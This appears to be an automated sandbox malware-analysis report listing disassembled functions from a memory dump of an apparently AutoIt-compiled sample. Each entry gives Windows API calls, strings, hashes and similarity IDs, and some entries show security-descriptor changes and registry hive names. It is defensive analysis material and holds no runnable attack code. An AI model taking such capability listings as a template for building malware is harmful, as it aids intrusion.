String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: 7bcfa168ca35640e0539b00d0248dffc42525a6cb77a4119a5a3725ac3319971
Instruction ID: 7a8b636d434482aaef9e355eaec8ee0f31cd6ebfdcf25cca9baf9acc4a769261
Opcode Fuzzy Hash: 7bcfa168ca35640e0539b00d0248dffc42525a6cb77a4119a5a3725ac3319971
Instruction Fuzzy Hash: 166160B1504305AFC710DF61C844A9BB3E8FF89314F04892FF99997251EB39E945CB9A

Function 0045DAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

CharLowerBuffW.USER32(?,?), ref: 0045DB26
GetDriveTypeW.KERNEL32 ref: 0045DB73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBBB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBF2
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DC20

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

Strings

wait, xrefs: 0045DBDD
close cd wait, xrefs: 0045DC0B
set cd door , xrefs: 0045DBC1
closed, xrefs: 0045DB3A, 0045DB43
type cdaudio alias cd wait, xrefs: 0045DB9E
close, xrefs: 0045DB2C
open, xrefs: 0045DB4D
open , xrefs: 0045DB82

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: 6203f7b2e749bc8331fab18158f5d89328f40fe1cc34c9cc590c287ddbd85508
Instruction ID: 434d96753f2e3c1b291a4883e1bf3e1a0d5ec245b6976702fc2bba59bcff3465
Opcode Fuzzy Hash: 6203f7b2e749bc8331fab18158f5d89328f40fe1cc34c9cc590c287ddbd85508
Instruction Fuzzy Hash: 57518C75504304AFC700EF11C98199BB7F5EF88719F50886EF88697252EB35EE09CB89

Function 00453110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00484085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00453145
LoadStringW.USER32(00000000,?,00484085,00000016), ref: 0045314E

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00484085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00453170
LoadStringW.USER32(00000000,?,00484085,00000016), ref: 00453173
__swprintf.LIBCMT ref: 004531B3
__swprintf.LIBCMT ref: 004531C5
_wprintf.LIBCMT ref: 0045326C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00453283

Strings

Error: , xrefs: 0045323C
Line %d (File "%s"):, xrefs: 004531BF
^ ERROR, xrefs: 00453216
Line %d:, xrefs: 004531AD
%s (%d) : ==> %s: %s %s, xrefs: 00453267

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 953b0f7b34e930fae5683ac945442eb370628273e681e211bf5fa7d79b37beb2
Instruction ID: a6974279006b0c3379477da358882d4776b597131aeca11177da36bcf5241a32
Opcode Fuzzy Hash: 953b0f7b34e930fae5683ac945442eb370628273e681e211bf5fa7d79b37beb2
Instruction Fuzzy Hash: A8415472900208A6CB04FFE1DD87EDF77789F14746F50006BF601B20A2DA796F48CA69

Function 0045D950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0045D96C
__swprintf.LIBCMT ref: 0045D98E
CreateDirectoryW.KERNEL32(?,00000000), ref: 0045D9CB
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0045D9F0
_memset.LIBCMT ref: 0045DA0F
_wcsncpy.LIBCMT ref: 0045DA4B
DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 0045DA80
CloseHandle.KERNEL32(00000000), ref: 0045DA8B
RemoveDirectoryW.KERNEL32(?), ref: 0045DA94
CloseHandle.KERNEL32(00000000), ref: 0045DA9E

Strings

\??\%s, xrefs: 0045D988
\, xrefs: 0045D9A4
:, xrefs: 0045D9AF

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: afa2c22fe718db5ef9f78e6514a3d46b180946c45c0a246b4b62232b6b6dc898
Instruction ID: 6c445d6bec98c900ef76f82308c85d4ccf866e2d554c137a5f4d1ad246a13049
Opcode Fuzzy Hash: afa2c22fe718db5ef9f78e6514a3d46b180946c45c0a246b4b62232b6b6dc898
Instruction Fuzzy Hash: CD3196B2900208ABDB20DFA4DC49FDB77BCEF98701F1081B6F915D2161E7749A458BA9

Function 0047E541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0047BD04,?,?), ref: 0047E564
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0047BD04,?,?,00000000,?), ref: 0047E57B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0047BD04,?,?,00000000,?), ref: 0047E586
CloseHandle.KERNEL32(00000000,?,?,?,?,0047BD04,?,?,00000000,?), ref: 0047E593
GlobalLock.KERNEL32(00000000), ref: 0047E59C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0047BD04,?,?,00000000,?), ref: 0047E5AB
GlobalUnlock.KERNEL32(00000000), ref: 0047E5B4
CloseHandle.KERNEL32(00000000,?,?,?,?,0047BD04,?,?,00000000,?), ref: 0047E5BB
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0047E5CC
OleLoadPicture.OLEAUT32(?,00000000,00000000,0049D9BC,?), ref: 0047E5E5
GlobalFree.KERNEL32(00000000), ref: 0047E5F5
GetObjectW.GDI32(00000000,00000018,?), ref: 0047E619
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0047E644
DeleteObject.GDI32(00000000), ref: 0047E66C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0047E682

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 2d1358db4c31995130d16767da47c7ac699cbb65a5c2754e5ff7af0779131277
Instruction ID: ca333501f90358f5bba19b9f19a3043f1e69b5dc158259da4744aa08232b5ef3
Opcode Fuzzy Hash: 2d1358db4c31995130d16767da47c7ac699cbb65a5c2754e5ff7af0779131277
Instruction Fuzzy Hash: 1F416D75900204BFDB119F65CC48EAB7BB8EF59715F1081AAF90AD7260D7349D01CB28

Function 00460B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00460C93
_wcscat.LIBCMT ref: 00460CAB
_wcscat.LIBCMT ref: 00460CBD
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00460CD2
SetCurrentDirectoryW.KERNEL32(?), ref: 00460CE6
GetFileAttributesW.KERNEL32(?), ref: 00460CFE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00460D18
SetCurrentDirectoryW.KERNEL32(?), ref: 00460D2A

Strings

*.*, xrefs: 00460D69

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 4c82b0b50a709457fd69a97228b78beedf19254048b8580e2f0caa374c6eabce
Instruction ID: d1be0be0023976dd97fce21cfa385490c383b178bb9133b2b7e8b6ce491f8fb3
Opcode Fuzzy Hash: 4c82b0b50a709457fd69a97228b78beedf19254048b8580e2f0caa374c6eabce
Instruction Fuzzy Hash: 5B8191715043059FC764DF64C844AABB7E8AF88314F14892FE985C7251FB38E985CB9B

Function 0044B593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0044B8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0044B903
Part of subcall function 0044B8E7: GetLastError.KERNEL32(?,0044B3CB,?,?,?), ref: 0044B90D
Part of subcall function 0044B8E7: GetProcessHeap.KERNEL32(00000008,?,?,0044B3CB,?,?,?), ref: 0044B91C
Part of subcall function 0044B8E7: RtlAllocateHeap.NTDLL(00000000,?,0044B3CB), ref: 0044B923
Part of subcall function 0044B8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0044B93A

Part of subcall function 0044B982: GetProcessHeap.KERNEL32(00000008,0044B3E1,00000000,00000000,?,0044B3E1,?), ref: 0044B98E
Part of subcall function 0044B982: RtlAllocateHeap.NTDLL(00000000,?,0044B3E1), ref: 0044B995
Part of subcall function 0044B982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,0044B3E1,?), ref: 0044B9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 0044B5F7
_memset.LIBCMT ref: 0044B60C
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0044B62B
GetLengthSid.ADVAPI32(?), ref: 0044B63C
GetAce.ADVAPI32(?,00000000,?), ref: 0044B679
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 0044B695
GetLengthSid.ADVAPI32(?), ref: 0044B6B2
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 0044B6C1
RtlAllocateHeap.NTDLL(00000000), ref: 0044B6C8
GetLengthSid.ADVAPI32(?,00000008,?), ref: 0044B6E9
CopySid.ADVAPI32(00000000), ref: 0044B6F0
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 0044B721
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0044B747
SetUserObjectSecurity.USER32(?,00000004,?), ref: 0044B75B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: aca69ba183b061f1a197d6d181ba62faef939378a4e081ccf161eef68aa3b62e
Instruction ID: 03c350641cdf80c649ddff2b1888ed7d59eaad573db31a7ffe53c4ccee45c038
Opcode Fuzzy Hash: aca69ba183b061f1a197d6d181ba62faef939378a4e081ccf161eef68aa3b62e
Instruction Fuzzy Hash: E7516D71900209AFEF009FA1DD85EEEBB79FF44314F04812AF915A7290DB34DA15CBA4

Function 0046A268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0046A2DD
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0046A2E9
CreateCompatibleDC.GDI32(?), ref: 0046A2F5
SelectObject.GDI32(00000000,?), ref: 0046A302
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 0046A356
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 0046A392
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 0046A3B6
SelectObject.GDI32(00000006,?), ref: 0046A3BE
DeleteObject.GDI32(?), ref: 0046A3C7
DeleteDC.GDI32(00000006), ref: 0046A3CE
ReleaseDC.USER32(00000000,?), ref: 0046A3D9

Strings

(, xrefs: 0046A37E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 6924721278bc3aca5af5dcdca8906f8514f6b2e61945229d13f20490b2c78c6b
Instruction ID: b9f42fc23bd4790091de0f64b0caeb9cf95159d5e63632e4fa0667ba292c1973
Opcode Fuzzy Hash: 6924721278bc3aca5af5dcdca8906f8514f6b2e61945229d13f20490b2c78c6b
Instruction Fuzzy Hash: D7514872900709AFCB14CFA8C885EAEBBB9EF48310F14842EF95AA7310D735A8418F55

Function 00473AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00472AA6,?,?), ref: 00473B0E

Strings

HKU, xrefs: 00473C06
HKCC, xrefs: 00473BC2
|EL, xrefs: 00473B27
HKCR, xrefs: 00473B9C
HKCU, xrefs: 00473BE4
HKEY_LOCAL_MACHINE, xrefs: 00473B5D
HKEY_CURRENT_CONFIG, xrefs: 00473BB1
HKLM, xrefs: 00473B72
HKEY_USERS, xrefs: 00473BF5
HKEY_CURRENT_USER, xrefs: 00473BD3
HKEY_CLASSES_ROOT, xrefs: 00473B87

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|EL
API String ID: 3964851224-2835623658
Opcode ID: 7a2534787c036a7426e5c5f3e53c89f8bee6780a1116b52fbd023f45915b20a4
Instruction ID: 45fe64ce3d4822395691192995de52f8d35c9a7cb810f10a3eb7793fc0e12d88
Opcode Fuzzy Hash: 7a2534787c036a7426e5c5f3e53c89f8bee6780a1116b52fbd023f45915b20a4
Instruction Fuzzy Hash: 9041AE352002498FDF05EF04E950BEA3362AF51384F94883FAC552B355DB3C9A0ADB59

Function 004532B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00483C64,00000010,00000000,Bad directive syntax error,004ADBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 004532D1
LoadStringW.USER32(00000000,?,00483C64,00000010), ref: 004532D8

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

_wprintf.LIBCMT ref: 00453309
__swprintf.LIBCMT ref: 0045332B
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00453395

Strings

Line %d (File "%s"):, xrefs: 0045333B
Error: , xrefs: 00453363
., xrefs: 0045337B
%s (%d) : ==> %s.: %s %s, xrefs: 00453304
Line %d:, xrefs: 00453325
"M, xrefs: 00453338, 00453322, 004532FE

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"M
API String ID: 1506413516-2604852928
Opcode ID: 08fa4b2089e7a8a3a0e209a5cf4f8c44f34bb6a994a0e6537ab76caa56bb4e09
Instruction ID: 15c38977c81e27d4971d0d20cb70327a30643c920d2c5fb3601b11371f268f04
Opcode Fuzzy Hash: 08fa4b2089e7a8a3a0e209a5cf4f8c44f34bb6a994a0e6537ab76caa56bb4e09
Instruction Fuzzy Hash: 53217131950219FBDF01AFD1CC0AFEE7735BF28706F00446BB905610A2EA799A58DB59

Function 0045D520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 0045D567

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

LoadStringW.USER32(?,?,00000FFF,?), ref: 0045D589
__swprintf.LIBCMT ref: 0045D5DC
_wprintf.LIBCMT ref: 0045D68D
_wprintf.LIBCMT ref: 0045D6AB

Strings

Error: , xrefs: 0045D657
"%s" (%d) : ==> %s:%s%s, xrefs: 0045D688
"%s" (%d) : ==> %s:, xrefs: 0045D6A6
Line %d (File "%s"):, xrefs: 0045D5D6
^ ERROR, xrefs: 0045D631

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-2391861430
Opcode ID: 266117102d2d61b162cf59d4ab4b70b9400acfcf0dc0990228feace01a66d740
Instruction ID: 236ecfd634bc607f45306068c1ee8b2d6718e96f140af3cc049bd5546393f16a
Opcode Fuzzy Hash: 266117102d2d61b162cf59d4ab4b70b9400acfcf0dc0990228feace01a66d740
Instruction Fuzzy Hash: 1851C471D00109BACB15FFA1CD42EEEB778AF14305F10406BF905B2162EA795F88DBA8

Function 0045D338 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 140COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0045D37F

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0045D3A0
__swprintf.LIBCMT ref: 0045D3F3
_wprintf.LIBCMT ref: 0045D499
_wprintf.LIBCMT ref: 0045D4B7

Strings

Error: , xrefs: 0045D463
^ ERROR , xrefs: 0045D432
"%s" (%d) : ==> %s:%s%s, xrefs: 0045D494
"%s" (%d) : ==> %s:, xrefs: 0045D4B2
Line %d (File "%s"):, xrefs: 0045D3ED

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-3420473620
Opcode ID: 084daa1a0edfae43cf21327584f09c9e7169931d16473503ed4ae076a38db3af
Instruction ID: 6d539e4775d1d0135896a180a91da24a5edbc67c604cbaf666e4d42bffe2d6e1
Opcode Fuzzy Hash: 084daa1a0edfae43cf21327584f09c9e7169931d16473503ed4ae076a38db3af
Instruction Fuzzy Hash: 1451C471D00108BACB15FFA1CD42EEEB778AF14305F10406BB90572062EB796F98DB69

Function 00457212 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

__swprintf.LIBCMT ref: 00457226
__swprintf.LIBCMT ref: 00457233

Part of subcall function 0043234B: __woutput_l.LIBCMT ref: 004323A4

FindResourceW.KERNEL32(?,?,0000000E), ref: 0045725D
LoadResource.KERNEL32(?,00000000), ref: 00457269
LockResource.KERNEL32(00000000), ref: 00457276
FindResourceW.KERNEL32(?,?,00000003), ref: 00457296
LoadResource.KERNEL32(?,00000000), ref: 004572A8
SizeofResource.KERNEL32(?,00000000), ref: 004572B7
LockResource.KERNEL32(?), ref: 004572C3
CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00457322

Strings

L6L, xrefs: 0045721F

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
